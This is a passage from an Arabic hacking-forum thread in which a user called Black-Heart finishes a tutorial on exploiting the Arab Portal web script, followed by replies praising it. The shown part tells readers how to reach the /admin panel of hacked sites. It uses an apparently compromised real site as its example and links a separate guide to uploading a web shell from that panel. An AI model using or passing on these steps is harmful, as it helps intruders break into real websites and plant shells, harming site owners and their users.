    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange]
    [url=http://up.top4top.net/downloadf-top4top_61afa7320a1-rar.html]ArabPortal | طھط­ظ…ظٹظ„[/url]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    الان نروح على لوحة التحكم مسارها /admin

    يعني موقعنا اللي ضربناه مثال يصير :-

    [COLOR=Red] [url=http://alzaidichair.com/admin/]لوحة التحكم[/url][/COLOR]

    طبعا اذا فيه لاحقة للموقع مانغيرها كما تعودنا

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    طيب احيان يا بلاك يكون الموقع في بعده portal او sa او ar او اي لاحقة يعني مثلا

    http://****.com/portal

    او

    http://****.com/ar

    وش اسوي انا امسحها ؟

    لا تخليها مثل ماهي وتحط المسار بعدها يعني يصير الرابط


    http://****.com/portal/admin

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    اما الان طريقة رفع الشل من اللوحة للي ما شاف شرحنا السابق يشوفه عبر الرابط التالي :-

    [URL]http://www.iq-team.org/vb/t30153.html[/URL]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [​IMG]

    أتمنى الشرح كان سهل ومفهوم وآسف على الإطالة , والسلام عليكم ورحمة الله وبركاته .

    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    عاشت الايادي
    بارك الله بيك
     


  3. غير متصل

    Black-Heart
    V • I • P

    عضو منذ:
    ‏24 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    أشكر لك مرورك العطر :{8!}:
     


  4. غير متصل

    Jeo Sawager
    Developer

    عضو منذ:
    ‏15 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    بآرك آلله بيك
    شرح وآضح وسهل , :{1!}:​
     


  5. غير متصل

    Gaza-Dz
    مراقب عآم

    عضو منذ:
    ‏26 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    112
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    DZ
    الإقامة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    السلام عليكم ورحمة الله
    مشاء الله عليك أخي و الله ابداع × ابداع
    الف شكرا علي السكربت + يوشم بالخمسة نجوم
    تقديرا للمجهوداتك المميزة + يجب أن تضع للبعض سمعات قبل إعطائها إلى Black-Heart مرة أخرى.
    وفقك الله
     


  6. غير متصل

    General Rahmane Developer plus
    DeveloPer Plus

    عضو منذ:
    ‏31 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    رائع جداً

    سلمت يداك يا بطل
     


  7. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    عاشت ايدك
    {1!$8}[​IMG][​IMG]
     


  8. غير متصل

    Dr-Dark Noir
    V • I • P

    عضو منذ:
    ‏17 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    وعليكم السلام ورحمة الله وبركاتة

    تسلم ايدك حبيبي Black-Heart على شرح رائع و طرح مميز :{2}:

    واصل ولا تحرمنا من جديدك :ُeُe0y:​
     


  9. غير متصل

    VB_Dev
    rank
    Developer

    عضو منذ:
    ‏21 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    يعطيك آلعآفيه آخيُ ..
     


  10. غير متصل

    TeePlow
    V • I • P

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:

    رد: ثغرة امنية بسكربت البوابة العربية || Arab Portal [ الدورك + الاستغلال ]

    السلام عليكم
    شرح رائع بارك الله فيك
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...